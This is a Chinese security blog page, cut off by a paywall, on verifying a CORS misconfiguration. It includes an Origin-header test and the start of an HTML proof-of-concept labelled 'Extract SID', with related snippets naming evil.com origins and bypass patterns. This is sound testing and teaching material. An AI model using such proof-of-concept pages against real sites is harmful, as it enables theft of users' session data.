一次CORS漏洞的手工验证

最新推荐文章于 2025-07-03 00:49:32 发布
最新推荐文章于 2025-07-03 00:49:32 发布
阅读量5.3k 收藏 10
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: 前端 安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MidSummer411/article/details/122324738
本文介绍了在进行安全扫描时发现CORS漏洞后如何手工验证,通过在API请求中添加特定headers来检查漏洞存在性。同时,文章提供了一个POC代码示例,警示了若攻击者利用此漏洞可能引发的危害,如数据泄露或IP误导。并以百度的安全设置为例,提出修复方法,包括无弹出框和隐藏的POC代码,以增强前端接口的安全性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

给项目接口做安全扫描的时候,发现有个CORS漏洞:
在这里插入图片描述
但仅仅扫出来还不够,需要手工验证一下

手工验证方式

在正常的api请求处,headers加入"origin":"http://xx.xx.xx.xx", 如果接口正常返回了数据且headers里包含

access-control-allow-credentials : true
access-control-allow-origin : http://xx.xx.xx.xx

就说明这个接口确实存在CORS漏洞

poc代码

<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    console.log(xhttp.responseText);
    if (this.readyState == 4 && this.status == 200) {
    document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
 
最低0.47元/天 解锁文章

200万优质内容无限畅学
CORS跨域资源共享漏洞
m0_55772907的博客
10-19 1万+
cors漏洞
安全测试 之 常见安全漏洞CORS
Orange_hhh的博客
06-03 948
CORS:(Cross-origin resource sharing)跨域资源共享,CORS是一种机制,这种机制通过在http头部添加字段,通常情况下,web应用A告诉浏览器,自己有权限访问应用B。这样就可以解决跨源的问题了。
CORS漏洞
最新发布
m0_73399576的博客
07-03 790
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
反射XSS和CORS漏洞组合拳
Python84310366的博客
06-05 622
CORS,跨域资源共享(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。其实漏洞挖掘的乐趣就在于不断的发掘有趣的利用姿势,在遇到一些看似“鸡肋”的漏洞时,可以不用忙着提交,多思考一下是否可以和其他漏洞形成组合拳,这样技术才会有上升的空间,漏洞危害也会因此而提高,相应的白帽子能获得的收益也最大。
cors漏洞验证
山兔的博客
04-09 385
在请求体当中添加Origin: https://evil.com请求头,看响应包里面有没有Access-Control-Allow-Origin: https://evil.com,有的话就说明存在这个漏洞
浅谈cors漏洞
weixin_63920195的博客
08-29 752
攻击者创建恶意网页并使用JavaScript构造跨域请求的poc(一般是获取敏感信息)origin 是源的意思 如果可控 并且返回包会出现以下两个字段。如果cors配置不当(检验不严格 只是简单校验是否包含该域名)如果cors需要绕过的话(子域名接管绕过)还要在poc设置。由于同源长策略 一些网站要实现跨域来共享资源的话。然后将获取的数据显发送回攻击者控制的服务器。头为服务器信任的域或子域。诱骗受害者访问该恶意网页。需要通过设置cors
CORS漏洞利用检测和利用方式
alert['Hello World']
09-01 5877
CORS漏洞利用检测和利用方式 CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。 检测方式: 1.curl访问网站 curl https://www.junsec.com -H "Origin: https://test.com" -I 检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com 2.burpsuite发送请求包,
安全漏洞CORS(跨域资源共享)
weixin_42925623的博客
11-22 3342
安全漏洞CORS(跨域资源共享)
跨域资源共享(CORS)-漏洞整理
weixin_30865427的博客
07-28 503
绕过方法整理 绕过 - 仅对域名校验 #POC #"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow- Credentials: true". #Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: ht...
浅析CORS攻击及其挖洞思路
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 1683
0x1 CORS机制   CORS全名跨域资源共享(Cross-Origin-Resourece-sharing),该机制主要是解决浏览器同源策略所带来的不便,使不同域的应用能够无视同源策略,进行信息传递。 引用一张图能很好地说明CORS机制的作用 0x2 CORS机制实现 那么这个机制是怎么发挥作用的呢? CORS的标准定义是:通过设置http头部字段,让客户端有资格跨域访问资源。通过服务器的验证和授权之后,浏览器有责任支持这些http头部字段并且确保能够正确的施加限制。 为了更好理解
网络安全全栈培训笔记(54-WEB攻防-通用漏洞&跨域CORS资源&JSONP回调&域名接管劫持)
qq_46343633的博客
01-17 1194
1、子域名接管检测&探针&利用2、C0SP跨域资源检测&探针&利用3、JSONP跨域回调-检侧&探针&利用#前置知识点:同源策路限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这是一个用于隔离潜在恶意文件的关键的安全机制简单说就是浏览器的一种安全策略。虽然同源策路在安全方面起到了很好的防护作用,但也在一定程度上限制了一些前端功能的实现,所以就有了许多跨域的手段。子域名接管:域名解析记录指向域名,对应主机指向了一个当前未在使用或已经删除的特定服务,攻击。
HTTP 请求走私漏洞详解
江左盟的博客
07-08 4128
超详细的HTTP请求走私漏洞教程,看完还不会你来找我。
常见的Web漏洞——CORS
江左盟的博客
06-05 3125
渗透做了多年的朋友都知道,大洞小洞都是漏洞。因此也学习、沉淀一下以前没重视的漏洞CORS漏洞原理、检测和利用方法。
Cors漏洞详解
热门推荐
Askshhbs的博客
04-26 1万+
Cors介绍 Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。 Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。 漏洞原理 Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三
CORS跨域访问漏洞
m0_73896875的博客
07-13 6612
全称是“跨域资源访问共享”(Cross-Origin Resource Sharing),是一种用于解决跨域资源访问限制的机制。它允许在浏览器中进行跨域请求,并控制跨域请求的安全性。同源策略(Same-Origin Policy)是浏览器的一种安全策略,它要求在访问资源时,请求的域名、协议和端口必须与资源所在的域名、协议和端口完全匹配。如果两个资源的域名、协议和端口不匹配,浏览器会限制跨域请求,并阻止脚本访问返回的响应数据。CORS 提供了一种机制,允许服务器端声明它所支持的跨域请求。
cors漏洞笔记
eatrys的博客
04-11 556
cors漏洞 cors称为跨域资源共享 它的诞生主要是解决浏览器的同源策略 同源策略又是什么呢 同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现 同源策略(same origin policy) SOP 可以理解为是浏览器...
Cors漏洞
saber的博客
10-30 722
Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露;Cors请求可分为两类
CORS跨域漏洞
weixin_46627652的博客
04-20 5568
Web服务端CORS(跨域资源共享)错误配置,无法正确验证Origin头,任何网站都可以发出使用用户凭据发出的请求,并读取对这些请求的响应,信任任意来源可以有效地禁用同源策略,从而允许第三方网站进行双向交互,易导致敏感信息泄露。抓取上述漏洞地址的请求包,构造Origin字段,并将Origin头参数值设为恶意域名,服务端返回的Access-Control-Allow-Origin字段值为修改的恶意域名,判断服务端并未正确处理跨域请求。(1)如果没有必要就不要开启CORS。(2)严格限制域白名单,而不是使用*
cors漏洞
03-08
### CORS漏洞原理 CORS(Cross-Origin Resource Sharing),即跨源资源共享,是由W3C制定的一项标准[^3]。这项技术允许Web应用通过在HTTP响应头中加入特定字段告知浏览器哪些外部域名可以访问当前站点资源。当一个请求来自不同的源(协议、域名或端口有所不同),则被认为是跨域请求。 如果服务器对于这些跨域请求缺乏严格的验证机制,则可能导致未经授权的数据泄露或其他恶意行为的发生,这就是所谓的CORS漏洞[^2]。 ### 防御方法 为了有效防止CORS相关的安全隐患,应当采取如下措施: #### 正确配置Access-Control-Allow-Origin Header 确保`Access-Control-Allow-Origin`头部只接受可信来源的请求,并尽可能具体地指定允许访问的源而不是使用通配符(*)[^1]。 ```http Access-Control-Allow-Origin: https://example.com ``` #### 实施预检请求(Pre-flight Requests) 对于非简单请求(如PUT, DELETE等方法或者带有自定义header的情况),浏览器会先发送一次OPTIONS请求作为预检,询问实际请求是否被允许执行。服务端应对此类请求做出恰当回应并设置相应的headers来表明后续真实请求能否被执行以及可携带的内容类型等信息。 ```http Access-Control-Allow-Methods: GET, POST, PUT Access-Control-Allow-Headers: X-Custom-Header ``` #### 使用凭证(Credentials)时需谨慎处理 当涉及到敏感数据传输时(比如涉及Cookies或Authorization headers),应该严格限制那些能够附带credentials属性为true的跨站请求的目标地址列表,并且不允许它们与通配符一起使用。 ```javascript fetch('https://api.example.com/data', { method: 'GET', credentials: 'include' }); ``` #### 定期审查和更新安全策略 随着业务逻辑的变化和技术的发展,定期评估现有的CORS政策是非常重要的。这有助于及时发现潜在的风险点并对现有防护手段作出相应调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值